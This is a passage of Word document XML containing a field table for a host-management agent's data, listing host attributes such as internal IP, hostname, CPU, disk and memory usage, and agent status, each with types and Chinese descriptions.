          <w:p w14:paraId="7D8E9D70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633AC2D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60512F08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258634F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11E2BD9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EB8BE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E62BBB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC8280F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35B5935A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53FA4BBE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4290E250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B46EC55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AE5477A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F401EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C176C0A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44389AC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A96AD91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="118D7563" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADD050B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="089254D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7998649E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6658E8F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BED8D50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63532A80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FB7AC57" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70CD2B2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FE0EE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728D83C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A04A842" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D00B74D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245B6092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>proxyIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60948825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D37DBBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F5DBDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代理ip，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AAE9A78" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F84F524" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABD3CB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CE519A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E1D7216" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="715D0FCC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7768DDAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kernelVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D0D7897" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58D7EFA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F10C4DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内核版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DB3AB90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A340A42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cpu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597A5746" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4572F557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>core：tinyint(4) producer：varchar(512) brand：varchar(512) description：varchar(1024) loadAvgFifteen:bigint(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663AED6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cpu信息 core：处理器个数 producer：厂商 brand：品牌 description：描述 loadAvgFifteen: cpu十五分钟系统平均负载 cpuNum:处理器颗数 cpuArch:处理器架构 clockSpeed:处理器主频，单位：MHz physicalCoreNum:物理核心总数 logicalCoreNum:逻辑核心总数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BB6C402" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C9B742" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>diskCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05885A3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFA81FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5759D114" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>硬盘个数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2537DE9F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D8A4F1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>diskSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E097222" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B6C6C74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79895968" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>硬盘大小，单位MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55DF0A56" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B644CB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>diskUsage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DF9885" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79EAD4FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40FA1AB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>硬盘使用率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1306F42B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689C5FC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>memoryUsage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52125923" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F26E61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="038150D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内存使用率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="704E6A35" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD1C19C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>memorySize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65FD22AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B288970" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2D5CD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内存大小，单位MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C841EC0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B4D5A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3195EC64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F9A96E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="489B6525" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>通信状态 1 – 在线 0 - 离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5614FE16" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="439C6B37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C9F10C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783151EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1720882E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Agent状态，0-在线 1-离线 2-停用 3-删除中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4EAA59E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6486BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastOnlineTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71918D9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F2F6EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF81780" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后在线时间，时间戳秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A242C19" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7847A292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F34A8F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5242AAD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A0492D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装时间，时间戳秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04583CD4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BC9260" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154837CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E91A5E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0495DD52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A9203C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="482240AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bashVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
